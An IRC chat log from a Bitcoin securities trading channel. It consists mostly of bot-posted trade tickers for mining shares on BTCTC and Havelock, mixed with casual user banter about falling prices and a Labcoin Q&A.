Aug 08 17:46:04 Next difficulty estimate | None based on data since last change | 50863515.1079 based on data for last three days Aug 08 17:46:26 [BTCTC] [DMS.SELLING] 5 @ 0.023 = 0.115 BTC [-] Aug 08 17:46:28 [BTCTC] [DMS.MINING] 5 @ 0.00561 = 0.0281 BTC [+] Aug 08 17:46:30 [BTCTC] [DMS.PURCHASE] 5 @ 0.02827 = 0.1414 BTC [-] Aug 08 17:47:08 [BTCTC] [DMS.SELLING] 10 @ 0.023 = 0.23 BTC [-] Aug 08 17:47:13 [BTCTC] [DMS.PURCHASE] 10 @ 0.02827 = 0.2827 BTC [-] Aug 08 17:47:52 [BTCTC] [DMS.SELLING] 10 @ 0.023 = 0.23 BTC [-] Aug 08 17:47:54 [BTCTC] [DMS.MINING] 10 @ 0.005609 = 0.0561 BTC [-] Aug 08 17:47:56 [BTCTC] [DMS.PURCHASE] 10 @ 0.02827 = 0.2827 BTC [-] Aug 08 17:48:35 [BTCTC] [DMS.SELLING] 7 @ 0.023 = 0.161 BTC [-] Aug 08 17:48:49 [BTCTC] [DMS.PURCHASE] 7 @ 0.02827 = 0.1979 BTC [-] Aug 08 17:49:34 [BTCTC] [DMS.SELLING] 7 @ 0.023 = 0.161 BTC [-] Aug 08 17:49:48 [BTCTC] [DMS.PURCHASE] 7 @ 0.02827 = 0.1979 BTC [-] Aug 08 17:51:01 [BTCTC] [LABCOIN] 50 @ 0.001356 = 0.0678 BTC [+] Aug 08 17:51:36 [HAVELOCK] [AM100] 69 @ 0.0361 = 2.4909 BTC [-] Aug 08 17:51:38 [HAVELOCK] [AM100] 31 @ 0.03601 = 1.1163 BTC [-] Aug 08 17:51:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.03628 = 0.1088 BTC [-] Aug 08 17:52:00 [HAVELOCK] [AM100] 105 @ 0.03601 = 3.7811 BTC [-] Aug 08 17:52:03 [HAVELOCK] [AM100] 395 @ 0.036 = 14.22 BTC [-] Aug 08 17:52:06 [BTCTC] [LABCOIN] 50 @ 0.00136 = 0.068 BTC [+] Aug 08 17:52:08 [BTCTC] [DMS.SELLING] 7 @ 0.023 = 0.161 BTC [-] Aug 08 17:52:15 [BTCTC] [DMS.MINING] 7 @ 0.005603 = 0.0392 BTC [-] Aug 08 17:52:17 [BTCTC] [DMS.PURCHASE] 7 @ 0.02827 = 0.1979 BTC [-] Aug 08 17:52:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.03628 BTC [-] Aug 08 17:52:40 [BTCTC] [LABCOIN] 50 @ 0.001362 = 0.0681 BTC [+] Aug 08 17:52:59 [BTCTC] [LABCOIN] 50 @ 0.001363 = 0.0682 BTC [+] Aug 08 17:53:10 [BTCTC] [DMS.SELLING] 2 @ 0.023 = 0.046 BTC [-] Aug 08 17:53:16 [BTCTC] [DMS.PURCHASE] 2 @ 0.02827 = 0.0565 BTC [-] Aug 08 17:53:17 [BTCTC] [LABCOIN] 50 @ 0.001363 = 0.0682 BTC [+] Aug 08 17:53:19 [BTCTC] [LABCOIN] 50 @ 0.001362 = 0.0681 BTC [-] Aug 08 17:53:32 [BTCTC] [LABCOIN] 235 @ 0.001361 = 0.3198 BTC [-] Aug 08 17:54:03 [BTCTC] [LABCOIN] 10 @ 0.001361 = 0.0136 BTC [-] Aug 08 17:54:17 [BTCTC] [LABCOIN] 10 @ 0.001363 = 0.0136 BTC [+] Aug 08 17:54:30 [BTCTC] [LABCOIN] 5 @ 0.001385 = 0.0069 BTC [+] Aug 08 17:54:35 [BTCTC] [LABCOIN] 225 @ 0.001363 = 0.3067 BTC [-] Aug 08 17:55:31 [BTCTC] [LABCOIN] 50 @ 0.001363 = 0.0682 BTC [-] Aug 08 17:56:21 [BTCTC] [LABCOIN] 50 @ 0.001365 = 0.0683 BTC [+] Aug 08 17:56:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Aug 08 17:56:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Aug 08 17:57:02 [BTCTC] [LABCOIN] 5 @ 0.001379 = 0.0069 BTC [+] Aug 08 17:57:16 [BTCTC] [LABCOIN] 2 @ 0.001364 = 0.0027 BTC [-] Aug 08 17:57:58 [BTCTC] [LABCOIN] 20 @ 0.001361 = 0.0272 BTC [-] Aug 08 17:58:15 [BTCTC] [LABCOIN] 10 @ 0.001361 = 0.0136 BTC [-] Aug 08 17:58:32 [BTCTC] [LABCOIN] 10 @ 0.001361 = 0.0136 BTC [-] Aug 08 17:58:47 [BTCTC] [LABCOIN] 10 @ 0.00136 = 0.0136 BTC [-] Aug 08 17:59:11 [BTCTC] [LABCOIN] 25 @ 0.001344 = 0.0336 BTC [-] Aug 08 17:59:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.03627 = 0.1088 BTC [-] Aug 08 18:00:15 [BTCTC] [LABCOIN] 50 @ 0.001347 = 0.0674 BTC [+] Aug 08 18:00:21 [BTCTC] [LABCOIN] 45 @ 0.00137 = 0.0617 BTC [+] Aug 08 18:00:36 [BTCTC] [LABCOIN] 50 @ 0.001351 = 0.0676 BTC [-] Aug 08 18:00:38 [BTCTC] [LABCOIN] 1 @ 0.00135 BTC [-] Aug 08 18:00:43 [BTCTC] [LABCOIN] 34 @ 0.001349 = 0.0459 BTC [-] Aug 08 18:01:57 [BTCTC] [ASICMINER-PT] 1 @ 3.584 BTC [-] Aug 08 18:01:58 [BTCTC] [ASICMINER-PT] 3 @ 3.583 = 10.749 BTC [-] Aug 08 18:02:00 [BTCTC] [ASICMINER-PT] 1 @ 3.582 BTC [-] Aug 08 18:02:01 [BTCTC] [ASICMINER-PT] 6 @ 3.58 = 21.48 BTC [-] Aug 08 18:02:02 [BTCTC] [ASICMINER-PT] 1 @ 3.571 BTC [-] Aug 08 18:02:03 [BTCTC] [ASICMINER-PT] 1 @ 3.57 BTC [-] Aug 08 18:02:04 [BTCTC] [ASICMINER-PT] 2 @ 3.57 = 7.14 BTC [-] Aug 08 18:02:05 [BTCTC] [ASICMINER-PT] 1 @ 3.545 BTC [-] Aug 08 18:02:06 [BTCTC] [ASICMINER-PT] 1 @ 3.542 BTC [-] Aug 08 18:02:07 [BTCTC] [ASICMINER-PT] 2 @ 3.531 = 7.062 BTC [-] Aug 08 18:02:08 [BTCTC] [ASICMINER-PT] 4 @ 3.53 = 14.12 BTC [-] Aug 08 18:02:09 [BTCTC] [ASICMINER-PT] 1 @ 3.521 BTC [-] Aug 08 18:02:10 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [-] Aug 08 18:02:12 [BTCTC] [ASICMINER-PT] 2 @ 3.52 = 7.04 BTC [-] Aug 08 18:02:13 [BTCTC] [ASICMINER-PT] 1 @ 3.512 BTC [-] Aug 08 18:02:14 [BTCTC] [ASICMINER-PT] 1 @ 3.511 BTC [-] Aug 08 18:02:15 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 08 18:02:15 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 08 18:02:16 [BTCTC] [ASICMINER-PT] 1 @ 3.504 BTC [-] Aug 08 18:02:17 [BTCTC] [ASICMINER-PT] 5 @ 3.503 = 17.515 BTC [-] Aug 08 18:02:18 [BTCTC] [ASICMINER-PT] 3 @ 3.501 = 10.503 BTC [-] Aug 08 18:02:19 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 08 18:02:20 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 08 18:02:21 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 08 18:05:10 [BTCTC] [LABCOIN] 8 @ 0.001345 = 0.0108 BTC [-] Aug 08 18:05:11 [BTCTC] [LABCOIN] 25 @ 0.001343 = 0.0336 BTC [-] Aug 08 18:05:13 [BTCTC] [LABCOIN] 80 @ 0.001343 = 0.1074 BTC [-] Aug 08 18:05:25 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [-] Aug 08 18:06:08 am down the drain Aug 08 18:06:58 all the things down the drain! Aug 08 18:07:06 yep. Aug 08 18:07:08 Well, ActM is stable at ~.006. Aug 08 18:07:31 [BTCTC] [TAT.ASICMINER] 27 @ 0.03591 = 0.9696 BTC [-] Aug 08 18:07:38 [HAVELOCK] [AM100] 3 @ 0.03600001 = 0.108 BTC [+] Aug 08 18:07:41 [HAVELOCK] [AM100] 156 @ 0.036 = 5.616 BTC [-] Aug 08 18:07:43 [HAVELOCK] [AM100] 99 @ 0.03590101 = 3.5542 BTC [-] Aug 08 18:07:45 [HAVELOCK] [AM100] 10 @ 0.03515 = 0.3515 BTC [-] Aug 08 18:07:47 [HAVELOCK] [AM100] 30 @ 0.0351 = 1.053 BTC [-] Aug 08 18:07:50 [HAVELOCK] [AM100] 2 @ 0.035 = 0.07 BTC [-] Aug 08 18:08:11 [BTCTC] [DMS.SELLING] 5 @ 0.0231 = 0.1155 BTC [+] Aug 08 18:08:12 [BTCTC] [LABCOIN] 70 @ 0.001345 = 0.0942 BTC [+] Aug 08 18:08:13 [BTCTC] [LABCOIN] 3745 @ 0.001342 = 5.0258 BTC [-] Aug 08 18:08:15 [BTCTC] [DMS.MINING] 5 @ 0.005601 = 0.028 BTC [-] Aug 08 18:08:16 [BTCTC] [DMS.PURCHASE] 5 @ 0.02827 = 0.1414 BTC [-] Aug 08 18:08:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.03592 = 0.1078 BTC [+] Aug 08 18:08:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0359 = 0.0718 BTC [-] Aug 08 18:08:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0358 = 0.179 BTC [-] Aug 08 18:08:32 [BTCTC] [TAT.ASICMINER] 57 @ 0.03569 = 2.0343 BTC [-] Aug 08 18:08:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.0356 = 0.1068 BTC [-] Aug 08 18:08:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.03557 = 0.3201 BTC [-] Aug 08 18:08:40 [BTCTC] [TAT.ASICMINER] 45 @ 0.03556 = 1.6002 BTC [-] Aug 08 18:08:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.03551 BTC [-] Aug 08 18:08:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.0355 = 0.1775 BTC [-] Aug 08 18:08:44 [BTCTC] [TAT.ASICMINER] 11 @ 0.03506 = 0.3857 BTC [-] Aug 08 18:08:44 [BTCTC] [TAT.ASICMINER] 55 @ 0.03505 = 1.9278 BTC [-] Aug 08 18:08:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.03502 = 0.1401 BTC [-] Aug 08 18:09:09 [BTCTC] [DMS.MINING] 5 @ 0.005601 = 0.028 BTC [-] Aug 08 18:09:10 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [+] Aug 08 18:09:24 [BTCTC] [BTCGARDEN] 36 @ 0.01581 = 0.5692 BTC [-] Aug 08 18:09:25 [BTCTC] [BTCGARDEN] 63 @ 0.01581 = 0.996 BTC [-] Aug 08 18:09:38 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [+] Aug 08 18:09:45 [BTCTC] [ACTIVEMINING] 68 @ 0.005857 = 0.3983 BTC [-] Aug 08 18:09:46 [BTCTC] [ACTIVEMINING] 50 @ 0.005844 = 0.2922 BTC [-] Aug 08 18:09:48 [BTCTC] [ACTIVEMINING] 147 @ 0.00566 = 0.832 BTC [-] Aug 08 18:09:49 [BTCTC] [ACTIVEMINING] 20 @ 0.005659 = 0.1132 BTC [-] Aug 08 18:09:49 [BTCTC] [ACTIVEMINING] 717 @ 0.005656 = 4.0554 BTC [-] Aug 08 18:09:51 [BTCTC] [ACTIVEMINING] 40 @ 0.005606 = 0.2242 BTC [-] Aug 08 18:09:52 [BTCTC] [ACTIVEMINING] 200 @ 0.005605 = 1.121 BTC [-] Aug 08 18:09:53 [BTCTC] [ACTIVEMINING] 182 @ 0.005601 = 1.0194 BTC [-] Aug 08 18:09:54 [BTCTC] [DMS.SELLING] 22 @ 0.023 = 0.506 BTC [-] Aug 08 18:09:55 [BTCTC] [ACTIVEMINING] 912 @ 0.0056 = 5.1072 BTC [-] Aug 08 18:09:56 [BTCTC] [ACTIVEMINING] 22 @ 0.005556 = 0.1222 BTC [-] Aug 08 18:09:57 [BTCTC] [ACTIVEMINING] 112 @ 0.005555 = 0.6222 BTC [-] Aug 08 18:09:59 [BTCTC] [ACTIVEMINING] 372 @ 0.005554 = 2.0661 BTC [-] Aug 08 18:10:00 [BTCTC] [ACTIVEMINING] 778 @ 0.005553 = 4.3202 BTC [-] Aug 08 18:10:00 [BTCTC] [DMS.PURCHASE] 22 @ 0.02827 = 0.6219 BTC [-] Aug 08 18:10:08 [11:07] Well, ActM is stable at ~.006. Aug 08 18:10:17 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [+] Aug 08 18:10:18 [BTCTC] [LABCOIN] 170 @ 0.001342 = 0.2281 BTC [-] Aug 08 18:10:20 [BTCTC] [LABCOIN] 780 @ 0.001337 = 1.0429 BTC [-] Aug 08 18:10:22 haha been waiting for that TAT? Aug 08 18:10:26 [HAVELOCK] [AM100] 25 @ 0.0365 = 0.9125 BTC [+] Aug 08 18:10:29 didnt have to wait long ;) Aug 08 18:10:43 [HAVELOCK] [XBOND] 80 @ 0.00104668 = 0.0837 BTC [+] Aug 08 18:10:43 Still in the clipboard probably Aug 08 18:11:06 [BTCTC] [LABCOIN] 50 @ 0.00134 = 0.067 BTC [+] Aug 08 18:11:43 Still true. give or take :P Aug 08 18:12:04 Wonder if theres a lotta coin flowing out of Securities and into cash Aug 08 18:12:05 [BTCTC] [LABCOIN] 50 @ 0.001338 = 0.0669 BTC [-] Aug 08 18:12:11 like USD cash Aug 08 18:12:19 possibly Aug 08 18:12:29 USD/BTC downtrend looks imminent Aug 08 18:12:56 Agreed Aug 08 18:13:10 <[1]lewicki> might pull a may 13th Aug 08 18:13:27 BTC so desperatly needs a liquid exchange Aug 08 18:13:31 <[1]lewicki> or 7/17 Aug 08 18:14:00 [BTCTC] [BASIC-MINING] 5 @ 0.2749 = 1.3745 BTC [-] Aug 08 18:14:11 [BTCTC] [COGNITIVE] 3 @ 0.331 = 0.993 BTC [-] Aug 08 18:14:11 ;;bcstats Aug 08 18:14:14 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [-] Aug 08 18:14:14 Current Blocks: 250930 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1069 blocks | Next Difficulty In About: 5 days, 10 hours, 14 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 08 18:14:14 [BTCTC] [COGNITIVE] 11 @ 0.3141 = 3.4551 BTC [-] Aug 08 18:14:28 broke the scale i guess Aug 08 18:15:09 [BTCTC] [BASIC-MINING] 4 @ 0.24 = 0.96 BTC [-] Aug 08 18:15:24 [BTCTC] [BTCGARDEN] 50 @ 0.0158 = 0.79 BTC [-] Aug 08 18:16:50 [BTCTC] [BTCGARDEN] 560 @ 0.0158 = 8.848 BTC [-] Aug 08 18:17:20 [BTCTC] [LTC-ATF.B2] 103 @ 0.01043 = 1.0743 BTC [+] Aug 08 18:17:23 [BTCTC] [LTC-ATF.B2] 250 @ 0.01043 = 2.6075 BTC [+] Aug 08 18:17:24 [BTCTC] [LTC-ATF.B2] 27 @ 0.010439 = 0.2819 BTC [+] Aug 08 18:18:29 [BTCTC] [DMS.PURCHASE] 24 @ 0.02827 = 0.6785 BTC [-] Aug 08 18:18:30 [BTCTC] [DMS.PURCHASE] 107 @ 0.02828 = 3.026 BTC [+] Aug 08 18:19:03 [BTCTC] [TAT.ASICMINER] 40 @ 0.0355 = 1.42 BTC [+] Aug 08 18:19:03 [BTCTC] [TAT.ASICMINER] 63 @ 0.0355 = 2.2365 BTC [+] Aug 08 18:20:18 [BTCTC] [ASICMINER-PT] 1 @ 3.597 BTC [+] Aug 08 18:26:20 sell sell sell Aug 08 18:26:29 [BTCTC] [DMS.MINING] 564 @ 0.0056 = 3.1584 BTC [-] Aug 08 18:26:37 avalon about to announce $200M deal! :p Aug 08 18:26:45 lol Aug 08 18:27:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.03614 = 0.1446 BTC [+] Aug 08 18:27:34 [BTCTC] [BITVPS] 10 @ 0.001931 = 0.0193 BTC [-] Aug 08 18:27:36 [BTCTC] [BITVPS] 84 @ 0.00193 = 0.1621 BTC [-] Aug 08 18:27:37 [BTCTC] [BITVPS] 37 @ 0.0019 = 0.0703 BTC [-] Aug 08 18:27:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.03614 = 0.3253 BTC [+] Aug 08 18:27:56 [BTCTC] [DMS.PURCHASE] 110 @ 0.02828 = 3.1108 BTC [+] Aug 08 18:28:16 gecko_x2 again ? Aug 08 18:28:25 https://twitter.com/ScottWapnerCNBC/statuses/364370798892421120 Aug 08 18:28:28 Twitter / ScottWapnerCNBC: Spoke to Joe Lewis this morning ... Aug 08 18:28:57 [BTCTC] [LABCOIN] 50 @ 0.001361 = 0.0681 BTC [+] Aug 08 18:28:58 [BTCTC] [LABCOIN] 1 @ 0.001362 BTC [+] Aug 08 18:29:00 [BTCTC] [LABCOIN] 20 @ 0.001363 = 0.0273 BTC [+] Aug 08 18:29:01 [BTCTC] [LABCOIN] 1 @ 0.001386 BTC [+] Aug 08 18:29:01 [BTCTC] [LABCOIN] 10 @ 0.001387 = 0.0139 BTC [+] Aug 08 18:29:02 [BTCTC] [LABCOIN] 12 @ 0.001394 = 0.0167 BTC [+] Aug 08 18:29:03 [BTCTC] [LABCOIN] 100 @ 0.001395 = 0.1395 BTC [+] Aug 08 18:29:04 [BTCTC] [LABCOIN] 1462 @ 0.001399 = 2.0453 BTC [+] Aug 08 18:29:06 [BTCTC] [BTCGARDEN] 50 @ 0.0158 = 0.79 BTC [-] Aug 08 18:29:09 [HAVELOCK] [AM100] 5 @ 0.0368995 = 0.1845 BTC [+] Aug 08 18:29:22 yes yes i know Aug 08 18:29:30 but this time it's 4 realz! Aug 08 18:29:32 i pramise Aug 08 18:29:52 [BTCTC] [LABCOIN] 50 @ 0.001397 = 0.0699 BTC [-] Aug 08 18:29:54 [BTCTC] [LABCOIN] 235 @ 0.001398 = 0.3285 BTC [+] Aug 08 18:30:01 [BTCTC] [LABCOIN] 235 @ 0.001399 = 0.3288 BTC [+] Aug 08 18:30:10 [BTCTC] [LABCOIN] 20 @ 0.001399 = 0.028 BTC [+] Aug 08 18:30:31 [HAVELOCK] [XBOND] 24 @ 0.00104668 = 0.0251 BTC [+] Aug 08 18:30:34 [BTCTC] [BITVPS] 1 @ 0.002073 BTC [+] Aug 08 18:30:35 [BTCTC] [BITVPS] 49 @ 0.002074 = 0.1016 BTC [+] Aug 08 18:30:55 [BTCTC] [LABCOIN] 1000 @ 0.0014 = 1.4 BTC [+] Aug 08 18:31:25 [BTCTC] [DMS.PURCHASE] 164 @ 0.02828 = 4.6379 BTC [+] Aug 08 18:31:34 [BTCTC] [LABCOIN] 50 @ 0.001351 = 0.0676 BTC [-] Aug 08 18:31:35 [BTCTC] [LABCOIN] 235 @ 0.00135 = 0.3173 BTC [-] Aug 08 18:31:37 [BTCTC] [LABCOIN] 8 @ 0.001349 = 0.0108 BTC [-] Aug 08 18:31:38 [BTCTC] [LABCOIN] 20 @ 0.001348 = 0.027 BTC [-] Aug 08 18:31:39 [BTCTC] [LABCOIN] 27 @ 0.001338 = 0.0361 BTC [-] Aug 08 18:31:40 [BTCTC] [LABCOIN] 220 @ 0.001337 = 0.2941 BTC [-] Aug 08 18:31:40 [BTCTC] [LABCOIN] 9 @ 0.001334 = 0.012 BTC [-] Aug 08 18:31:43 [BTCTC] [LABCOIN] 4 @ 0.001333 = 0.0053 BTC [-] Aug 08 18:31:43 [BTCTC] [LABCOIN] 75 @ 0.001333 = 0.1 BTC [-] Aug 08 18:31:44 [BTCTC] [LABCOIN] 50 @ 0.001333 = 0.0667 BTC [-] Aug 08 18:31:46 [BTCTC] [DMS.MINING] 15 @ 0.005852 = 0.0878 BTC [+] Aug 08 18:32:13 [HAVELOCK] [XBOND] 13858 @ 0.00104668 = 14.5049 BTC [+] Aug 08 18:32:18 [BTCTC] [LABCOIN] 494 @ 0.001333 = 0.6585 BTC [-] Aug 08 18:32:48 [BTCTC] [ACTIVEMINING] 68 @ 0.005963 = 0.4055 BTC [+] Aug 08 18:32:49 [BTCTC] [ACTIVEMINING] 132 @ 0.005964 = 0.7872 BTC [+] Aug 08 18:33:12 [HAVELOCK] [HIM] 1 @ 0.139 BTC [-] Aug 08 18:33:15 [HAVELOCK] [HIM] 25 @ 0.138 = 3.45 BTC [-] Aug 08 18:33:16 [HAVELOCK] [HIM] 1 @ 0.1376 BTC [-] Aug 08 18:33:18 [HAVELOCK] [HIM] 100 @ 0.1375 = 13.75 BTC [-] Aug 08 18:33:44 Labcoin Q&A starting now in #labcoin Aug 08 18:33:49 come watch the show Aug 08 18:34:15 [HAVELOCK] [HIM] 5 @ 0.13620042 = 0.681 BTC [-] Aug 08 18:34:18 [HAVELOCK] [HIM] 2 @ 0.1362 = 0.2724 BTC [-] Aug 08 18:34:20 [HAVELOCK] [HIM] 7 @ 0.1361 = 0.9527 BTC [-] Aug 08 18:35:23 [BTCTC] [FIMB] 135 @ 0.0105 = 1.4175 BTC [+] Aug 08 18:35:24 "Let's get this IPO over with!" Aug 08 18:35:25 [HAVELOCK] [AM100] 1 @ 0.0368995 BTC [+] Aug 08 18:36:04 indeed Aug 08 18:36:16 [BTCTC] [TAT.ASICMINER] 13 @ 0.03522 = 0.4579 BTC [-] Aug 08 18:36:44 [BTCTC] [ACTIVEMINING] 10 @ 0.005851 = 0.0585 BTC [-] Aug 08 18:36:45 [BTCTC] [ACTIVEMINING] 40 @ 0.005851 = 0.234 BTC [-] Aug 08 18:36:54 [BTCTC] [ASICMINER-PT] 1 @ 3.56 BTC [-] Aug 08 18:37:12 This will be interesting... Aug 08 18:37:15 [BTCTC] [ACTIVEMINING] 28 @ 0.005851 = 0.1638 BTC [-] Aug 08 18:37:19 o Vbs Aug 08 18:38:04 they wait til Vbs couldnt be available prolly Aug 08 18:38:15 [HAVELOCK] [AM100] 1 @ 0.03510001 BTC [-] Aug 08 18:38:18 [HAVELOCK] [AM100] 10 @ 0.0351 = 0.351 BTC [-] Aug 08 18:38:20 He will find something to bitch about Aug 08 18:38:20 [HAVELOCK] [AM100] 287 @ 0.035 = 10.045 BTC [-] Aug 08 18:38:47 [HAVELOCK] [SDSTM] 4 @ 0.00553101 = 0.0221 BTC [-] Aug 08 18:39:06 [HAVELOCK] [SDSTM] 4 @ 0.005531 = 0.0221 BTC [-] Aug 08 18:39:09 [HAVELOCK] [SDSTM] 8 @ 0.00553 = 0.0442 BTC [-] Aug 08 18:39:11 [HAVELOCK] [SDSTM] 22 @ 0.005502 = 0.121 BTC [-] Aug 08 18:39:13 [HAVELOCK] [SDSTM] 6 @ 0.00550111 = 0.033 BTC [-] Aug 08 18:39:15 [BTCTC] [BASIC-MINING] 1 @ 0.2306 BTC [-] Aug 08 18:39:15 [HAVELOCK] [SDSTM] 5 @ 0.005501 = 0.0275 BTC [-] Aug 08 18:39:19 [BTCTC] [BASIC-MINING] 8 @ 0.2251 = 1.8008 BTC [-] Aug 08 18:39:19 [BTCTC] [BASIC-MINING] 2 @ 0.225 = 0.45 BTC [-] Aug 08 18:39:30 [HAVELOCK] [LABCO] 2 @ 0.0018199 = 0.0036 BTC [+] Aug 08 18:39:34 [HAVELOCK] [SDSTM] 65 @ 0.005501 = 0.3576 BTC [-] Aug 08 18:41:12 deprived is an idiot Aug 08 18:41:38 oh yeah? Aug 08 18:41:50 I know what you are, but what am I Aug 08 18:42:28 [BTCTC] [BASIC-MINING] 6 @ 0.224 = 1.344 BTC [-] Aug 08 18:42:54 I know it might be nothing, but it's pinging the guy at EU Aug 08 18:43:13 this is gonna be fun Aug 08 18:43:27 cant believe theres people in #labcoin finally lol Aug 08 18:44:02 [HAVELOCK] [AM100] 532 @ 0.035 = 18.62 BTC [-] Aug 08 18:44:27 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [+] Aug 08 18:44:38 [BTCTC] [BASIC-MINING] 3 @ 0.2239 = 0.6717 BTC [-] Aug 08 18:44:39 [BTCTC] [BASIC-MINING] 19 @ 0.224 = 4.256 BTC [+] Aug 08 18:44:57 Gonna make some money off basic today Aug 08 18:45:23 [BTCTC] [BASIC-MINING] 4 @ 0.224 = 0.896 BTC [+] Aug 08 18:45:28 [BTCTC] [BASIC-MINING] 1 @ 0.2571 BTC [+] Aug 08 18:47:48 [HAVELOCK] [XBOND] 3014 @ 0.00104668 = 3.1547 BTC [+] Aug 08 18:48:09 [HAVELOCK] [XBOND] 600 @ 0.00104699 = 0.6282 BTC [+] Aug 08 18:49:28 [BTCTC] [RSM] 2 @ 0.0119 = 0.0238 BTC [+] Aug 08 18:50:10 [BTCTC] [S.MPOE-PT] 5 @ 0.00096 = 0.0048 BTC [-] Aug 08 18:50:33 [HAVELOCK] [AM100] 156 @ 0.035 = 5.46 BTC [-] Aug 08 18:51:59 [BTCTC] [ACTIVEMINING] 10 @ 0.005907 = 0.0591 BTC [+] Aug 08 18:52:01 [BTCTC] [ACTIVEMINING] 68 @ 0.005907 = 0.4017 BTC [+] Aug 08 18:52:17 [BTCTC] [ACTIVEMINING] 112 @ 0.005907 = 0.6616 BTC [+] Aug 08 18:57:19 [BTCTC] [DMS.PURCHASE] 175 @ 0.02828 = 4.949 BTC [+] Aug 08 18:57:30 [HAVELOCK] [XBOND] 6 @ 0.001047 = 0.0063 BTC [+] Aug 08 18:58:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.03625 = 0.0725 BTC [+] Aug 08 18:58:41 [HAVELOCK] [SDSTM] 6 @ 0.0055011 = 0.033 BTC [+] Aug 08 18:59:03 [HAVELOCK] [XBOND] 20 @ 0.001047 = 0.0209 BTC [+] Aug 08 18:59:17 [HAVELOCK] [XBOND] 10 @ 0.001047 = 0.0105 BTC [+] Aug 08 18:59:26 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 08 19:00:18 [HAVELOCK] [AM100] 4 @ 0.035 = 0.14 BTC [-] Aug 08 19:00:36 [HAVELOCK] [XBOND] 100 @ 0.001047 = 0.1047 BTC [+] Aug 08 19:00:47 [HAVELOCK] [XBOND] 30 @ 0.001047 = 0.0314 BTC [+] Aug 08 19:00:57 [HAVELOCK] [XBOND] 3 @ 0.001047 = 0.0031 BTC [+] Aug 08 19:01:34 [BTCTC] [ASICMINER-PT] 2 @ 3.56 = 7.12 BTC [-] Aug 08 19:02:26 [BTCTC] [COG.F] 1 @ 5 BTC [+] Aug 08 19:02:36 [BTCTC] [DMS.MINING] 26 @ 0.005825 = 0.1515 BTC [-] Aug 08 19:02:37 [BTCTC] [DMS.MINING] 12 @ 0.005896 = 0.0708 BTC [+] Aug 08 19:02:39 [BTCTC] [DMS.MINING] 10 @ 0.0059 = 0.059 BTC [+] Aug 08 19:02:39 [BTCTC] [DMS.MINING] 41 @ 0.00595 = 0.244 BTC [+] Aug 08 19:02:40 [BTCTC] [DMS.MINING] 75 @ 0.00599 = 0.4493 BTC [+] Aug 08 19:04:33 [BTCTC] [DMS.MINING] 7 @ 0.006177 = 0.0432 BTC [+] Aug 08 19:05:10 [BTCTC] [DMS.MINING] 46 @ 0.0056 = 0.2576 BTC [-] Aug 08 19:05:46 [BTCTC] [TAT.ASICMINER] 42 @ 0.03607 = 1.5149 BTC [-] Aug 08 19:05:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002234 BTC [-] Aug 08 19:06:16 [HAVELOCK] [XBOND] 4500 @ 0.001047 = 4.7115 BTC [+] Aug 08 19:08:59 [12:08] <+labcoin_dev> it's very unlikely we are making everything up Aug 08 19:09:09 yeah lol Aug 08 19:09:26 it's easy to make things up! Aug 08 19:09:32 :) Aug 08 19:09:40 well,of course it's not a 100% true statement Aug 08 19:09:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.03601 = 0.2161 BTC [-] Aug 08 19:10:18 [BTCTC] [LABCOIN] 2 @ 0.001402 = 0.0028 BTC [+] Aug 08 19:10:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.03602 BTC [+] Aug 08 19:10:23 [HAVELOCK] [XBOND] 3 @ 0.001047 = 0.0031 BTC [+] Aug 08 19:10:34 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 08 19:10:39 [BTCTC] [ASICMINER-PT] 1 @ 3.598 BTC [+] Aug 08 19:10:40 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [+] Aug 08 19:10:50 [BTCTC] [LABCOIN] 31 @ 0.001402 = 0.0435 BTC [+] Aug 08 19:11:04 [BTCTC] [LABCOIN] 20 @ 0.001403 = 0.0281 BTC [+] Aug 08 19:11:54 [BTCTC] [LABCOIN] 42 @ 0.001413 = 0.0593 BTC [+] Aug 08 19:11:55 [BTCTC] [LABCOIN] 67 @ 0.001414 = 0.0947 BTC [+] Aug 08 19:11:57 [HAVELOCK] [XBOND] 1000 @ 0.001047 = 1.047 BTC [+] Aug 08 19:12:14 [HAVELOCK] [XBOND] 50 @ 0.001047 = 0.0524 BTC [+] Aug 08 19:12:24 [BTCTC] [DMS.MINING] 5 @ 0.005501 = 0.0275 BTC [-] Aug 08 19:12:26 [BTCTC] [DMS.MINING] 41 @ 0.0055 = 0.2255 BTC [-] Aug 08 19:12:26 [BTCTC] [DMS.MINING] 8 @ 0.0055 = 0.044 BTC [-] Aug 08 19:12:32 [HAVELOCK] [XBOND] 